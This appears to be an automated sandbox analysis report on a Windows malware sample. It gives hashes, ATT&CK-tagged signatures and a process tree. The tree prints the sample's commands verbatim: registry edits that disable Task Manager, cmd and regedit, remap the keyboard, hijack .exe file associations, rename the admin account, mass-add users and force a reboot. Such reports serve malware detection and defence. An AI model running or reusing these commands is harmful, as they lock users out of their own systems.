Analysis
-
max time kernel
4s -
max time network
5s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18-10-2024 02:33
Static task
static1
Behavioral task
behavioral1
Sample
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
Resource
win10v2004-20241007-en
Errors
General
-
Target
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
-
Size
955KB
-
MD5
bde1d37ad1cf05320955681bf6455efa
-
SHA1
52feb8bc6c21770eea00d19b1c228ee707228da7
-
SHA256
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f
-
SHA512
17d9f2c319aa082d5fdf97ba7bc49505c1f768bf217383b220204cf7b4511d0c227408200e40a943c1e5228a1199f7ef218d5fdfd66d394547a6efb4a72e1e15
-
SSDEEP
24576:kuDXTIGaPhEYzUzA0SH6xrfNZh0WewxWr:DDjlabwz9nxJZ+wxc
Malware Config
Signatures
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "NUL" reg.exe -
Drops file in System32 directory 28 IoCs
Processes:
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exedescription ioc process File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\__tmp_rar_sfx_access_check_259416886 b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.bmp b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\aplicaciones.vbs b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File created C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe File opened for modification C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\img000.png" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Modifies registry class 7 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSExeHandler\Shell\Open\Command\ = "wscript.exe \"C:\\Windows\\System32\\Microsoft\\Protect\\Defender.Update\\aplicaciones.vbs\" \"\" " cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "VBSExeHandler" cmd.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
WMIC.exeshutdown.exedescription pid process Token: SeIncreaseQuotaPrivilege 2624 WMIC.exe Token: SeSecurityPrivilege 2624 WMIC.exe Token: SeTakeOwnershipPrivilege 2624 WMIC.exe Token: SeLoadDriverPrivilege 2624 WMIC.exe Token: SeSystemProfilePrivilege 2624 WMIC.exe Token: SeSystemtimePrivilege 2624 WMIC.exe Token: SeProfSingleProcessPrivilege 2624 WMIC.exe Token: SeIncBasePriorityPrivilege 2624 WMIC.exe Token: SeCreatePagefilePrivilege 2624 WMIC.exe Token: SeBackupPrivilege 2624 WMIC.exe Token: SeRestorePrivilege 2624 WMIC.exe Token: SeShutdownPrivilege 2624 WMIC.exe Token: SeDebugPrivilege 2624 WMIC.exe Token: SeSystemEnvironmentPrivilege 2624 WMIC.exe Token: SeRemoteShutdownPrivilege 2624 WMIC.exe Token: SeUndockPrivilege 2624 WMIC.exe Token: SeManageVolumePrivilege 2624 WMIC.exe Token: 33 2624 WMIC.exe Token: 34 2624 WMIC.exe Token: 35 2624 WMIC.exe Token: SeIncreaseQuotaPrivilege 2624 WMIC.exe Token: SeSecurityPrivilege 2624 WMIC.exe Token: SeTakeOwnershipPrivilege 2624 WMIC.exe Token: SeLoadDriverPrivilege 2624 WMIC.exe Token: SeSystemProfilePrivilege 2624 WMIC.exe Token: SeSystemtimePrivilege 2624 WMIC.exe Token: SeProfSingleProcessPrivilege 2624 WMIC.exe Token: SeIncBasePriorityPrivilege 2624 WMIC.exe Token: SeCreatePagefilePrivilege 2624 WMIC.exe Token: SeBackupPrivilege 2624 WMIC.exe Token: SeRestorePrivilege 2624 WMIC.exe Token: SeShutdownPrivilege 2624 WMIC.exe Token: SeDebugPrivilege 2624 WMIC.exe Token: SeSystemEnvironmentPrivilege 2624 WMIC.exe Token: SeRemoteShutdownPrivilege 2624 WMIC.exe Token: SeUndockPrivilege 2624 WMIC.exe Token: SeManageVolumePrivilege 2624 WMIC.exe Token: 33 2624 WMIC.exe Token: 34 2624 WMIC.exe Token: 35 2624 WMIC.exe Token: SeShutdownPrivilege 2588 shutdown.exe Token: SeRemoteShutdownPrivilege 2588 shutdown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exeWScript.execmd.exenet.exenet.exedescription pid process target process PID 2828 wrote to memory of 2740 2828 b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe WScript.exe PID 2828 wrote to memory of 2740 2828 b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe WScript.exe PID 2828 wrote to memory of 2740 2828 b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe WScript.exe PID 2740 wrote to memory of 2304 2740 WScript.exe cmd.exe PID 2740 wrote to memory of 2304 2740 WScript.exe cmd.exe PID 2740 wrote to memory of 2304 2740 WScript.exe cmd.exe PID 2304 wrote to memory of 1948 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1948 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1948 2304 cmd.exe reg.exe PID 2304 wrote to memory of 536 2304 cmd.exe reg.exe PID 2304 wrote to memory of 536 2304 cmd.exe reg.exe PID 2304 wrote to memory of 536 2304 cmd.exe reg.exe PID 2304 wrote to memory of 484 2304 cmd.exe reg.exe PID 2304 wrote to memory of 484 2304 cmd.exe reg.exe PID 2304 wrote to memory of 484 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1152 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1152 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1152 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1012 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1012 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1012 2304 cmd.exe reg.exe PID 2304 wrote to memory of 632 2304 cmd.exe reg.exe PID 2304 wrote to memory of 632 2304 cmd.exe reg.exe PID 2304 wrote to memory of 632 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2908 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2908 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2908 2304 cmd.exe reg.exe PID 2304 wrote to memory of 3016 2304 cmd.exe rundll32.exe PID 2304 wrote to memory of 3016 2304 cmd.exe rundll32.exe PID 2304 wrote to memory of 3016 2304 cmd.exe rundll32.exe PID 2304 wrote to memory of 580 2304 cmd.exe reg.exe PID 2304 wrote to memory of 580 2304 cmd.exe reg.exe PID 2304 wrote to memory of 580 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1844 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1844 2304 cmd.exe reg.exe PID 2304 wrote to memory of 1844 2304 cmd.exe reg.exe PID 2304 wrote to memory of 828 2304 cmd.exe reg.exe PID 2304 wrote to memory of 828 2304 cmd.exe reg.exe PID 2304 wrote to memory of 828 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2436 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2436 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2436 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2640 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2640 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2640 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2772 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2772 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2772 2304 cmd.exe reg.exe PID 2304 wrote to memory of 2624 2304 cmd.exe WMIC.exe PID 2304 wrote to memory of 2624 2304 cmd.exe WMIC.exe PID 2304 wrote to memory of 2624 2304 cmd.exe WMIC.exe PID 2304 wrote to memory of 1608 2304 cmd.exe net.exe PID 2304 wrote to memory of 1608 2304 cmd.exe net.exe PID 2304 wrote to memory of 1608 2304 cmd.exe net.exe PID 1608 wrote to memory of 3068 1608 net.exe net1.exe PID 1608 wrote to memory of 3068 1608 net.exe net1.exe PID 1608 wrote to memory of 3068 1608 net.exe net1.exe PID 2304 wrote to memory of 1228 2304 cmd.exe net.exe PID 2304 wrote to memory of 1228 2304 cmd.exe net.exe PID 2304 wrote to memory of 1228 2304 cmd.exe net.exe PID 1228 wrote to memory of 2552 1228 net.exe net1.exe PID 1228 wrote to memory of 2552 1228 net.exe net1.exe PID 1228 wrote to memory of 2552 1228 net.exe net1.exe PID 2304 wrote to memory of 2548 2304 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\System32\cmd.execmd /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000071000000000000010000003b0000003c0000003d0000003e0000003f0000004000000041000000420000004300000044000000570000005800000037e000004600000052e0000047e0000049e0000051e000004fe0000053e0000048e000004be0000050e000004de00000520000005300000051000000500000004f0000004b0000004c0000004d0000004e0000004900000048000000470000004500000035e00000370000004a0000002900000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000f0000001000000011000000130000001600000017000000190000001a0000001b0000002b000000280000002700000026000000250000002400000022000000210000003a0000002a0000001d0000005be00000380000002c0000002d0000002e0000002f0000003000000032000000330000003400000035000000360000001de000005de000005ce0000038e000005900000065e0000021e000006be000005ee000005fe000006ae0000069e0000068e0000067e0000032e000006ce000006de0000066e0000020e000002ee000002ce0000030e0000019e0000010e0000024e0000022e0000000 /f4⤵PID:1948
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f4⤵PID:536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f4⤵PID:484
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f4⤵PID:1152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f4⤵PID:1012
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f4⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:632 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f4⤵
- Sets desktop wallpaper using registry
PID:2908 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:3016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f4⤵PID:580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f4⤵PID:1844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f4⤵PID:828
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:2436
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f4⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
PID:2772 -
C:\Windows\System32\Wbem\WMIC.exewmic useraccount where name='Admin' rename "YOU ARE THE NEXT"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Windows\system32\net.exenet user "YOU ARE THE NEXT" "im dead"4⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"5⤵PID:3068
-
C:\Windows\system32\net.exenet user T3yZrQ Maxcheto /add4⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user T3yZrQ Maxcheto /add5⤵PID:2552
-
C:\Windows\system32\net.exenet user 8rJpX1 Maxcheto /add4⤵PID:2548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8rJpX1 Maxcheto /add5⤵PID:1824
-
C:\Windows\system32\net.exenet user 9MaL2Z Maxcheto /add4⤵PID:2360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 9MaL2Z Maxcheto /add5⤵PID:1900
-
C:\Windows\system32\net.exenet user K4$dF27 Maxcheto /add4⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user K4$dF27 Maxcheto /add5⤵PID:1304
-
C:\Windows\system32\net.exenet user xC78RT Maxcheto /add4⤵PID:2492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user xC78RT Maxcheto /add5⤵PID:2096
-
C:\Windows\system32\net.exenet user 3nL9$p2x Maxcheto /add4⤵PID:2148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add5⤵PID:2432
-
C:\Windows\system32\net.exenet user X7hbQ5Z Maxcheto /add4⤵PID:2232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add5⤵PID:2204
-
C:\Windows\system32\net.exenet user R2xD1B Maxcheto /add4⤵PID:2164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user R2xD1B Maxcheto /add5⤵PID:2060
-
C:\Windows\system32\net.exenet user m14T8z Maxcheto /add4⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user m14T8z Maxcheto /add5⤵PID:2300
-
C:\Windows\system32\net.exenet user L27w8G Maxcheto /add4⤵PID:2384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user L27w8G Maxcheto /add5⤵PID:1468
-
C:\Windows\system32\net.exenet user P9dR2Y Maxcheto /add4⤵PID:1292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user P9dR2Y Maxcheto /add5⤵PID:2212
-
C:\Windows\system32\net.exenet user 5QL71t Maxcheto /add4⤵PID:2468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5QL71t Maxcheto /add5⤵PID:552
-
C:\Windows\system32\net.exenet user r8B6V3F Maxcheto /add4⤵PID:1848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user r8B6V3F Maxcheto /add5⤵PID:2132
-
C:\Windows\system32\net.exenet user 7CXz1b Maxcheto /add4⤵PID:2472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 7CXz1b Maxcheto /add5⤵PID:1068
-
C:\Windows\system32\net.exenet user n38vJQ Maxcheto /add4⤵PID:1484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user n38vJQ Maxcheto /add5⤵PID:1796
-
C:\Windows\system32\net.exenet user x6G7P1L Maxcheto /add4⤵PID:1332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user x6G7P1L Maxcheto /add5⤵PID:1588
-
C:\Windows\system32\net.exenet user M239Wk Maxcheto /add4⤵PID:2320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user M239Wk Maxcheto /add5⤵PID:1804
-
C:\Windows\system32\net.exenet user 7F2hY4Z Maxcheto /add4⤵PID:1344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add5⤵PID:1508
-
C:\Windows\system32\net.exenet user 8QrB1L7 Maxcheto /add4⤵PID:1992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add5⤵PID:1076
-
C:\Windows\system32\net.exenet user t93V6D Maxcheto /add4⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t93V6D Maxcheto /add5⤵PID:748
-
C:\Windows\system32\net.exenet user 5tG2Q8J Maxcheto /add4⤵PID:1128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add5⤵PID:2600
-
C:\Windows\system32\net.exenet user x9K1P7L Maxcheto /add4⤵PID:2000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user x9K1P7L Maxcheto /add5⤵PID:2620
-
C:\Windows\system32\net.exenet user z7R4M3 Maxcheto /add4⤵PID:2352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user z7R4M3 Maxcheto /add5⤵PID:2580
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:1576
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
784KB
MD540e2162dfc51fded60ea7b1de3acf588
SHA13c0b932a845027db10e67c47c0c9cd45fa80ecbb
SHA256d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7
SHA512453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a
-
Filesize
64B
MD5e3a317c88b65b975be8e1c21e149f16d
SHA16e7a24a1146ba2800bf0c56ef5b17ea32b01f019
SHA256b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0
SHA5121d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044
-
Filesize
68KB
MD5908587d867cd053293e2106d70cf42f3
SHA183ffc3fc7f61d972b41347ff783a29b41bf13087
SHA256f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444
SHA512541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8
-
Filesize
195KB
MD544055016d847ddbd0e8f0a56ea2a0ba6
SHA1cb4e3dfdb804aebb78c96100b42b29db28d902cd
SHA2562fa62a6d8816d3a7f45a371449ef044851556f6d38fc5030be3f58a25ccbd7f2
SHA5123edee078f8221c4ff1da59215dcc8e2144db74c5679e386645c3c3a34038cc23f11f83ba86efeeb94f3b01ec90dc72d83da1a09c91cb0cb02d8019c5d226b9c4
-
Filesize
5KB
MD57835d8ae389b8b78ea4d06c024d63849
SHA15a0196e67a8af7185b372aacf5ad817a26546ad1
SHA256029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1
SHA5123b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372
-
Filesize
134B
MD57c652236d1e09a76cfc27cb2611b80ad
SHA1f9c359054835b06308165e110cdc5229d4fda8fb
SHA2564026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c
SHA5126a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe
-
Filesize
14KB
MD5f346c440007285aff13e1e0512608862
SHA14b4a44bc30d37c66dea948bd406effc2bcc63775
SHA2562f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901
SHA51234fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032
-
Filesize
1KB
MD54947724257526b4226e21ae7541822cd
SHA1af4db735de48a5069e70758bdfdf41a8214aa346
SHA25619fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba
SHA51252986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902
-
Filesize
2KB
MD52f368b76ab153329fb42db70493474b1
SHA14c4752399ee2678f6cf4d67affca9dcba59d0023
SHA256ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f
SHA512adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a
-
Filesize
2KB
MD59ef9685c5a578bfdceccaedb0d5fa519
SHA1713f8621414772eee6602f9fa9ee0a3528d62057
SHA2566c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746
SHA5122238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb
-
Filesize
68KB
MD51db691b8c60c5f82f3dae2df999c1c7c
SHA1c252d4a6e065ab5b122f0ae43f6abdbaad49d80e
SHA256f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d
SHA5123629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e